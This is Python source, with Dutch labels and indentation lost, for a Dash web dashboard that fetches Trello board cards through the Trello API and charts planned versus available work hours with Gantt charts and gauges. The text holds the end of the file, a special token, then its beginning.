'maindivs', style=globals['styles']['maindivs'], children=[html.H3(
'Uitleg'), dcc.Markdown(
'In dit tabblad is een middellange termijnplanning te zien.')]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Totalen'), dcc.Markdown(
'Hieronder staan twee totaaloverzichten van de aankomende maanden.'
), dcc.Markdown(
'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'
), dcc.Markdown(
'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className
='maindivs', style=globals['styles']['maindivs'], children=[html.H4
('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in
data['arrays']['threemonths']], multi=False, searchable=False,
value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[
'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])
])])])
@app.callback(Output('gantttactisch', 'figure'), [Input(
'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
if v1 != None:
if v1[4:] == '12':
v1plus1 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus1 = str(int(v1) + 1)
if v1[4:] == '01':
v1min1 = str(int(v1[0:4]) - 1) + '12'
else:
v1min1 = str(int(v1) - 1)
if v1[4:] == '11':
v1plus2 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus2 = str(int(v1) + 2)
import random
import numpy as np
from operator import itemgetter
ganttdata = []
monthkey = int(v1)
for i, j in data['kaarten'].items():
if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
try:
if int(datetime.strftime(j['Begindatum'], '%Y%m')
) <= monthkey and int(datetime.strftime(j[
'Einddatum'], '%Y%m')) >= monthkey:
if j['Begindatum'].date() < datetime.strptime(
v1min1 + '01', '%Y%m%d').date():
start = datetime.strptime(v1min1 + '01', '%Y%m%d'
).date()
else:
start = j['Begindatum'].date()
if j['Einddatum'].date() >= datetime.strptime(
v1plus2 + '01', '%Y%m%d').date():
eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'
).date()
else:
eind = j['Einddatum'].date()
ganttdata.append(dict(Task=j['Epic'], Start=start,
Finish=eind, Resource=j['Naam'] + ' (uren: ' +
str(round(data['urenperdagperkaart'][j['Naam']]
['urenperperiode'][v1])) + ')'))
except:
pass
result = sorted(ganttdata, key=itemgetter('Task'))
rgb = []
for c in range(len(result)):
r = list(np.random.choice(range(256), size=3))
s2 = ','.join(map(str, r))
s1 = 'rgb('
s3 = ')'
rgb.append(s1 + s2 + s3)
fig = ff.create_gantt(result, index_col='Resource', show_colorbar=
True, group_tasks=False, showgrid_x=True, showgrid_y=True,
colors=rgb)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +
'-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],
line={'shape': 'spline', 'color': 'black', 'width': 4},
showlegend=False))
fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +
v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],
y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',
'width': 4}, showlegend=False))
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttpersoon', 'figure'), [Input(
'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i, j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'
] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
'value')])
def update_ganttepics(value):
ganttdata = []
for i, j in data['kaarten'].items():
if j['Epic'] == value and j['Status'] != 'Archived':
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Status']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('urenpermaand', 'figure'), [Input(
'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},
yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})
bars = []
if 'Regulier werk' in value:
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['urenperdagperkaart'].values() if value[config.get(
'Custom Field for Categories')] == 'Regulier werk']), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=
'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},
mode='lines+markers', marker={'symbol': 'triangle-up-open',
'size': 10}, stackgroup='one'))
for categorie in data['arrays'][config.get('Custom Field for Categories')]:
if categorie in value and categorie != 'Regulier werk':
if categorie == None:
categorienaam = 'Geen categorie'
else:
categorienaam = categorie
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for
value in data['urenperdagperkaart'].values() if value[
config.get('Custom Field for Categories')] == categorie
]), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,
name=categorienaam, line={'shape': 'spline', 'smoothing':
0.4}, mode='lines+markers', marker={'symbol':
'triangle-up-open', 'size': 10}, stackgroup='one'))
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['beschikbareuren'].values()]), 0))
bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[
'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':
'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))
return {'data': bars, 'layout': layout}
@app.server.route('/dash/configuration/')
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename='configuration.txt', as_attachment=True,
cache_timeout=0)
if __name__ == '__main__':
app.run_server(debug=False, host='0.0.0.0', port=8050)
<|reserved_special_token_1|>
import os, json, locale, requests, dash, dash_table, copy, time, flask, base64
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import pandas as pd
from os import listdir
import plotly.figure_factory as ff
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from dash.dependencies import Input, Output
from datetime import date,datetime,timedelta,time
from dateutil.relativedelta import relativedelta
#--! Check if app is deployed
try:
with open('./configuration/credentials.txt') as json_file:
credentials = json.load(json_file)
with open('./configuration/configuration.txt') as json_file:
config = json.load(json_file)
except:
raise Exception('Draai eerst deploy.py!')
#--! Set locale
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')
#--! Set all global variables
globals = {'config': config, 'credentials': credentials, 'styles': {}}
board_url = 'https://api.trello.com/1/members/me/boards?fields=name&key='+credentials.get('API key')+ "&token="+credentials.get('API token')
boards = json.loads(json.dumps(requests.get(board_url).json()))
globals['boards'] = boards
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
'background-image': """url('./assets/left.png')""",
'background-repeat': 'no-repeat',
'background-position': '0px 0px',
'margin-top': '1%',
'margin-bottom': '1%',
'margin-left': '1%',
'margin-right': '1%',
'text-align': 'center',
'border-radius': '10px'
}
globals['styles']['tabs'] = {'border-style': 'solid',
'border-width': '2px',
'background': 'rgb(255,255,255)',
'background': 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)',
'margin-top': '5px',
'margin-bottom': '5px',
'margin-right': '5px',
'margin-left': '5px',
'border-radius': '6px'
}
globals['styles']['divgraphs'] = {'background-color': 'rgba(62,182,235,0.1)',
'margin-top': '1%',
'margin-bottom': '2%',
'margin-left': '1%',
'margin-right': '1%',
'text-align': 'center',
'border-radius': '10px'
}
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
globals['graphlayouts']= {'bars': go.Layout(barmode='stack', paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
#--! Create function to refresh data
def get_data(value):
# set data variable to global to use in other functions
global data
global config
with open('./configuration/configuration.txt') as json_file:
configfile = json.load(json_file)
config = configfile.get(value)
# set all url variables
keys = "key="+credentials.get('API key')+"&token="+credentials.get('API token')
trello_base_url = "https://api.trello.com/1/"
board_url = trello_base_url+"boards/"+ value
#board_url = trello_base_url+"boards/"+ config.get('Board ID')
url_cards = board_url+"?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&"+keys
url_lists = board_url+"/lists?filter=all&"+keys
url_customfields = board_url+"/customFields?"+keys
url_labels = board_url+"/labels?"+keys
url_members = board_url+"/members?"+keys
# get JSON
board = json.loads(json.dumps(requests.get(url_cards).json()))
lists = json.loads(json.dumps(requests.get(url_lists).json()))
customfields = json.loads(json.dumps(requests.get(url_customfields).json()))
labels = json.loads(json.dumps(requests.get(url_labels).json()))
members = json.loads(json.dumps(requests.get(url_members).json()))
cards = board['cards']
# create function to convert Trello date to datetime
def dateCalc(date):
try:
newdate = datetime.strptime(date[0:19],'%Y-%m-%dT%H:%M:%S')
return newdate
except:
return None
# create dict for custom fields
customfields_dict = {'date': {},'list': {}, 'text': {}, 'number': {}, 'checkbox': {}}
for i in customfields:
customfields_dict[i['type']] = {}
for i in customfields:
customfields_dict[i['type']][i['id']] = {}
for i in customfields:
if i['type'] == 'list':
customfields_dict[i['type']][i['id']]['name'] = i['name']
customfields_dict['list'][i['id']]['options'] = {}
for j in i['options']:
customfields_dict['list'][i['id']]['options'][j['id']] = j['value'].get('text')
else:
customfields_dict[i['type']][i['id']]['name'] = i['name']
# collect all chosen lists
chosenlists = []
for i in config.get('Not Started'):
chosenlists.append(i)
chosenlists.extend(config.get('Blocked'))
chosenlists.extend(config.get('Doing'))
chosenlists.extend(config.get('Done'))
for i in config.get('Epics'):
chosenlists.append(i)
for i in config.get('Always continuing'):
chosenlists.append(i)
for i in config.get('List with Epics Done'):
chosenlists.append(i)
# create function to convert cardid to datetime
def idtodate(cardid):
hex = cardid[0:8]
timestamp = int(hex,16)
timedate = datetime.fromtimestamp(timestamp)
return timedate
# create function to get the epic id from the attachment-urls
def get_epicid(url):
try:
if 'epicId=' in url:
start = url.find('epicId=')+7
end = url.find('&attachmentId=')
return url[start:end]
else:
pass
except:
pass
# create dict for cards
kaarten = {i['id']: {'Naam': i['name'],
'KaartID': i['id'],
'ListID': i['idList'],
'customfields': i['customFieldItems'],
'Aangemaakt': idtodate(i['id']),
'labels': [label['name'] for label in i['labels'] if i['labels'] != []],
'members': [member['fullName'] for member in members if member['id'] in i['idMembers']],
'Sjabloon': i['isTemplate'],
'Vervaldatum': dateCalc(i['due']),
'Gearchiveerd': i['closed'],
'epicid': [get_epicid(j['url']) for j in i['attachments']],
'Epic': None,
'shortUrl': i['shortUrl']
} for i in cards}
# remove all attachments except epic-attachments, plus add all members in one string field
for i,j in kaarten.items():
while None in j['epicid']:
j['epicid'].remove(None)
if j['members'] != []:
j['Leden'] = ''
for k in j['members']:
if j['Leden'] == '':
j['Leden'] += k
else:
j['Leden'] += ', '+ k
else:
j['Leden'] = None
del j['members']
# add the custom fields to cards-dict
if customfields_dict != {}:
for i,j in customfields_dict.items():
for k,l in j.items():
for m,n in kaarten.items():
n[l['name']] = None
for i,j in kaarten.items():
for k in j['customfields']:
if k['idCustomField'] in customfields_dict['list'].keys():
j[customfields_dict['list'][k['idCustomField']].get('name')] = customfields_dict['list'][k['idCustomField']]['options'].get(k['idValue'])
elif k['idCustomField'] in customfields_dict['checkbox'].keys():
if k['value']['checked'] == 'true':
j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = True
else:
j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = False
elif k['idCustomField'] in customfields_dict['date'].keys():
j[customfields_dict['date'][k['idCustomField']].get('name')] = dateCalc(k['value'].get('date'))
else:
for key in k['value']:
j[customfields_dict[key][k['idCustomField']].get('name')] = k['value'].get(key)
# add epicname
epicIdNameCategory = []
for i,j in kaarten.items():
epicIdNameCategory.append((i,j['Naam'],j[config.get('Custom Field for Categories')]))
for i,j in kaarten.items():
if j['epicid'] == []:
j['Epic'] = 'Geen epic'
j['Categorie'] = None
else:
for k in epicIdNameCategory:
if k[0] == j['epicid'][0]:
j['Epic'] = k[1]
j['Categorie'] = k[2]
del j['epicid']
# add listname and status
for i,j in kaarten.items():
for k in lists:
if j['ListID'] == k['id']: j['Lijst'] = k['name']
if j['Lijst'] in config.get('Not Started'):
j['Status'] = 'Niet gestart'
elif j['Lijst'] in config.get('Doing'):
j['Status'] = 'Doing'
elif j['Lijst'] in config.get('Blocked'):
j['Status'] = 'Blocked'
elif j['Lijst'] in config.get('Done'):
j['Status'] = 'Done'
elif j['Lijst'] in config.get('Always continuing'):
j['Status'] = 'Doorlopend'
elif j['Lijst'] in config.get('Epics'):
j['Status'] = 'Epics Doing'
elif j['Lijst'] in config.get('List with Epics Done'):
j['Status'] = 'Epics Done'
else:
j['Status'] = 'Archived'
del j['customfields']
del j['ListID']
for i,j in kaarten.items():
if j['Gearchiveerd'] == True and j['Status'] != 'Done':
j['Status'] = 'Archived'
# collect all lists with cards to delete
liststodelete = []
for i in lists:
if i['name'] not in chosenlists:
liststodelete.append(i['name'])
# collect all cards to delete
cardstodelete = []
for i,j in kaarten.items():
if j['Sjabloon'] == True:
cardstodelete.append(i)
elif j['Lijst'] in liststodelete:
cardstodelete.append(i)
# create hours-dict for available hours
hours = {}
for i,j in kaarten.items():
if j['Lijst'] == config.get('List for hours'):
hours[j['Naam']] = {config['Custom Field for Starting date']: j[config['Custom Field for Starting date']], config['Custom Field for Ending date']: j[config['Custom Field for Ending date']], config['Custom Field with hours']: j[config['Custom Field with hours']]}
# delete previously collected cards
for i in cardstodelete:
if i in kaarten:
del kaarten[i]
# create list with all dates (6 months history, 1yr in advance)
tmpdatesdict = {}
now = datetime.now().date()
numdays = 365
numdayshistory = 183
for x in range (0, numdays):
tmpdatesdict[str(now + timedelta(days = x))] = {}
for x in range (0,numdayshistory):
tmpdatesdict[str(now - timedelta(days = x))] = {}
dates = []
for i in sorted(tmpdatesdict):
dates.append(i)
# create some global arrays for later use
arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten.values()])),
'xaxis_months': list(dict.fromkeys([i[0:4]+"-"+i[5:7]+"-01" for i in dates])),
'perioden': list(dict.fromkeys([i[0:4]+i[5:7] for i in dates])),
'statuses': list(dict.fromkeys([card['Status'] for card in kaarten.values()])),
config.get('Custom Field for Categories'): list(dict.fromkeys([card[config.get('Custom Field for Categories')] for card in kaarten.values()])),
config.get('Custom Field for Person'): list(dict.fromkeys([card[config.get('Custom Field for Person')] if card[config.get('Custom Field for Person')] != None else 'Geen ' + config.get('Custom Field for Person') for card in kaarten.values() ])),
}
# create dict to calculate the hours per day for each card
try:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'],
'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'],
'shortUrl': kaart['shortUrl'],
config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],
config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],
'Gebied': kaart['Gebied'],
config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],
config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],
config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],
'Cognosrapport': kaart['Cognosrapport'],
'Niet meenemen in telling': kaart['Niet meenemen in telling'],
'Lijst': kaart['Lijst'],
'Status': kaart['Status'],
'urenperdag': {i:0 for i in dates},
'urenperperiode': {i:0 for i in arrays['perioden']}}
for kaart in kaarten.values()}
except:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'],
'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'],
'shortUrl': kaart['shortUrl'],
config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],
config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],
config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],
config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],
config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],
'Lijst': kaart['Lijst'],
'Status': kaart['Status'],
'urenperdag': {i:0 for i in dates},
'urenperperiode': {i:0 for i in arrays['perioden']}}
for kaart in kaarten.values()}
# do the same for available hours
beschikbareuren = {key: {'urenperdag': {i:0 for i in dates},
'urenperperiode': {i:0 for i in arrays['perioden']}}
for key in hours.keys()}
for i in dates:
datekey = datetime.strptime(i,'%Y-%m-%d').date()
for k,l in kaarten.items():
if l['Niet meenemen in telling'] != True:
try:
if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():
delta = l[config.get('Custom Field for Ending date')] - l[config.get('Custom Field for Starting date')]
hoursperday = int(l[config.get('Custom Field with hours')])/int(delta.days)
urenperdagperkaart[l['Naam']]['urenperdag'][i] = hoursperday
except:
pass
for k,l in hours.items():
try:
if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():
hoursperday = int(l[config.get('Custom Field with hours')])/int(30.4)
beschikbareuren[k]['urenperdag'][i] = hoursperday
except:
pass
# calculate the hours per month with the hours per day for each card
for i,j in urenperdagperkaart.items():
for k,l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m==k[0:4]+k[5:7]:
j['urenperperiode'][m] += l
# do the same for available hours
for i,j in beschikbareuren.items():
for k,l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m==k[0:4]+k[5:7]:
j['urenperperiode'][m] += l
# create data for a dataframe with the hours per month
dfurenpermaand = copy.deepcopy(urenperdagperkaart)
for i,j in dfurenpermaand.items():
try:
j['Geplande uren'] = int(j['Geplande uren'])
except:
j['Geplande uren'] = 0
for k,l in j['urenperperiode'].items():
j[k] = round(l,2)
del j['urenperperiode']
# create a bar chart with all cards with no begin and end date
bars = []
labelsnietingepland = []
for j in kaarten.values():
if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':
labelsnietingepland.append(j['Lijst'])
labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
for i,j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':
tmp = []
for label in labelsnietingepland:
if j['Lijst'] == label:
tmp.append(int(j['Geplande uren']))
else:
tmp.append(0)
bars.append(dict(x=labelsnietingepland,
y=tmp,
name=j['Naam'],
type='bar',
opacity='0.6'))
# create a bar chart with all cards with no begin and end date per epic
epicbars = []
tmpepicsforbarchart = {epic: 0 for epic in [name['Naam'] for name in kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
tmpepicsforbarchart['Geen epic'] = 0
for i,j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':
tmpepicsforbarchart[j['Epic']] += int(j[config.get('Custom Field with hours')])
epicsforbarchart = { k:v for k,v in tmpepicsforbarchart.items() if v!=0 }
epicbars.append(dict(x=[key for key in epicsforbarchart.keys()],
y=[value for value in epicsforbarchart.values()],
type='bar',
text=[value for value in epicsforbarchart.values()],
textposition='outside',
opacity='0.6'))
# create figure for gauge (planned vs available hours)
thismonth = datetime.strftime(datetime.now(), '%Y%m')
nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,'%Y%m').strftime('%B'))]
gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))
gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))
gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))
deltathismonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))
deltanextmonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))
deltatwomonths = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))
if deltathismonth > gaugegeplandthismonth:
gaugerangethismonth = deltathismonth + 20
else:
gaugerangethismonth = gaugegeplandthismonth + 20
if deltanextmonth > gaugegeplandnextmonth:
gaugerangenextmonth = deltanextmonth + 20
else:
gaugerangenextmonth = gaugegeplandnextmonth + 20
if deltatwomonths > gaugegeplandtwomonths:
gaugerangetwomonths = deltatwomonths + 20
else:
gaugerangetwomonths = gaugegeplandtwomonths + 20
gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
'bar': {'color': '#3eb6eb'},
'steps': [
{'range': [0, deltathismonth*0.5], 'color': '#3deb34'},
{'range': [deltathismonth*0.5, deltathismonth*0.75], 'color': '#b4eb34'},
{'range': [deltathismonth*0.75, deltathismonth*0.9], 'color': '#ebb434'},
{'range': [deltathismonth*0.9, deltathismonth], 'color': '#eb6e34'},
{'range': [deltathismonth,gaugerangethismonth], 'color': '#eb3434'},
],
'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}
}
gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
'bar': {'color': '#3eb6eb'},
'steps': [
{'range': [0, deltanextmonth*0.5], 'color': '#3deb34'},
{'range': [deltanextmonth*0.5, deltanextmonth*0.75], 'color': '#b4eb34'},
{'range': [deltanextmonth*0.75, deltanextmonth*0.9], 'color': '#ebb434'},
{'range': [deltanextmonth*0.9, deltanextmonth], 'color': '#eb6e34'},
{'range': [deltanextmonth,gaugerangenextmonth], 'color': '#eb3434'},
],
'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}
}
gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
'bar': {'color': '#3eb6eb'},
'steps': [
{'range': [0, deltatwomonths*0.5], 'color': '#3deb34'},
{'range': [deltatwomonths*0.5, deltatwomonths*0.75], 'color': '#b4eb34'},
{'range': [deltatwomonths*0.75, deltatwomonths*0.9], 'color': '#ebb434'},
{'range': [deltatwomonths*0.9, deltatwomonths], 'color': '#eb6e34'},
{'range': [deltatwomonths,gaugerangetwomonths], 'color': '#eb3434'},
],
'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}
}
gaugefig = go.Figure()
gaugefig.add_trace(go.Indicator(
domain = {'x': [0, 0.3], 'y': [0, 1]},
value = gaugegeplandthismonth,
mode = "gauge+number+delta",
title = {'text': "Totale uren voor " + datetime.strptime(thismonth,'%Y%m').strftime('%B')},
delta = {'reference': deltathismonth},
gauge = gaugestepsthismonth
))
gaugefig.add_trace(go.Indicator(
domain = {'x': [0.35, 0.65], 'y': [0, 1]},
value = gaugegeplandnextmonth,
mode = "gauge+number+delta",
title = {'text': "Totale uren voor " + datetime.strptime(nextmonth,'%Y%m').strftime('%B')},
delta = {'reference': deltanextmonth},
gauge = gaugestepsnextmonth
))
gaugefig.add_trace(go.Indicator(
domain = {'x': [0.7, 1], 'y': [0, 1]},
value = gaugegeplandtwomonths,
mode = "gauge+number+delta",
title = {'text': "Totale uren voor " + datetime.strptime(twomonths,'%Y%m').strftime('%B')},
delta = {'reference': deltatwomonths},
gauge = gaugestepstwomonths
))
gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',)
graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars, 'gaugefig': gaugefig}
columntypes = {}
for key, value in kaarten[next(iter(kaarten))].items():
if 'datum' in key or key == 'Aangemaakt':
columntypes[key] = 'datetime'
elif type(value) == int:
columntypes[key] = 'numeric'
elif type(value in [str,bool]):
columntypes[key] = 'text'
columntypesurenpermaand = dict(columntypes)
columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
data = {'kaarten': kaarten,
'arrays': arrays,
'urenperdagperkaart': urenperdagperkaart,
'beschikbareuren': beschikbareuren,
'graphdata': graphdata,
'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
'columntypes': columntypes,
'urenpermaand': pd.DataFrame(data=dfurenpermaand).T,
'columntypesurenpermaand': columntypesurenpermaand
}
}
#--! Create layout function. Only create a simple layout with a few components. The rest will be loaded using callbacks.
def make_layout():
return html.Div(
className='First Div',
children=[
html.Div(
style={
'font-style': 'italic',
'font-weight': 'bold',
'border': '10px',
'box-shadow': '8px 8px 8px grey',
'background': 'rgb(149,193,31)',
'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',
'margin-top': '1%',
'margin-bottom': '1%',
'margin-right': '1%',
'margin-left': '1%',
'border-radius': '10px',
'text-align': 'center'
},
className='Banner',
children=[
html.Div(
style={'display': 'inline-block', 'width': '80%'},
children=[
html.H1('Trello borden USD'),
]
),
html.Div(
style={'display': 'inline-block', 'margin-right': '1px'},
children=[
html.Img(src=app.get_asset_url('logonop.png'), style={'width': '150px','margin-right': '0px'})
]
)
]
),
html.H5('Kies hieronder een bord', style={'text-align': 'center'}),
dcc.Dropdown(
id='dropdown_boards',
options=[{'label': i['name'], 'value': i['id']} for i in boards],
value = boards[0]['id'],
),
html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),
html.Div(
id='test'
)
]
)#/firstdiv
#--! Get CSS files and scripts and set App (including layout)
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,external_scripts=external_scripts, url_base_pathname='/dash/')
app.layout = make_layout
#--! Set Dash to suppress callback exceptions, because some callbacks can only be made when the first callback in the main layout has been made.
app.config['suppress_callback_exceptions'] = True
#--! Define app callbacks
#---! dropdown_boards
# This function should be changed when more boards are added. For now, only Werkvoorraad is compatible.
@app.callback(Output('test', 'children'),
[Input('dropdown_boards', 'value'),
Input('refreshdatabtn', 'n_clicks')]
)
def create_maindiv(value, n_clicks):
# first retrieve all data
get_data(value)
import os
if os.name=='nt':
daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
else:
daterefreshed = datetime.strftime(datetime.now(),'%A %-d %B, %H:%M')
# Return all other divs
return html.Div(
className='',
children=[
# Show date of refresh
dcc.Markdown('''**Laatst ververst: **''' + daterefreshed),
# Create tabs
dcc.Tabs(
className='Tabs',
children=[
# Create first tab
dcc.Tab(
label='Gantt charts',
style=globals['styles']['tabs'],
children=[
html.Div(
className='tab2_div1',
style=globals['styles']['maindivs'],
children=[
html.H3('Uitleg'),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Markdown('''In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'''),
]
),
]
),
html.Div(
className='tab2_div2',
style=globals['styles']['maindivs'],
children=[
html.H4('Gantt per epic'),
dcc.Dropdown(
style = globals['styles']['dropdowns'],
id='dropdownganttepics',
options=[{'label':name, 'value':name} for name in data['arrays']['epics']],
value = [next(iter(data['arrays']['epics']))]
),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(id='ganttepics'),
]
),
]
),
html.Div(
className='tab2_div3',
style=globals['styles']['maindivs'],
children=[
html.H4('Gantt per persoon'),
dcc.Dropdown(
style = globals['styles']['dropdowns'],
id='dropdownganttpersoon',
options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Person')]],
),
dcc.Dropdown(
style = globals['styles']['dropdowns'],
id='dropdownganttpersoonstatus',
options=[{'label':name, 'value':name} for name in data['arrays']['statuses']],
value = data['arrays']['statuses'],
multi=True,
),
html.Div(
style=globals['styles']['divgraphs'],
children=[
dcc.Graph(id='ganttpersoon'),
]
),
]
),
]
),
dcc.Tab(
label='Data export',
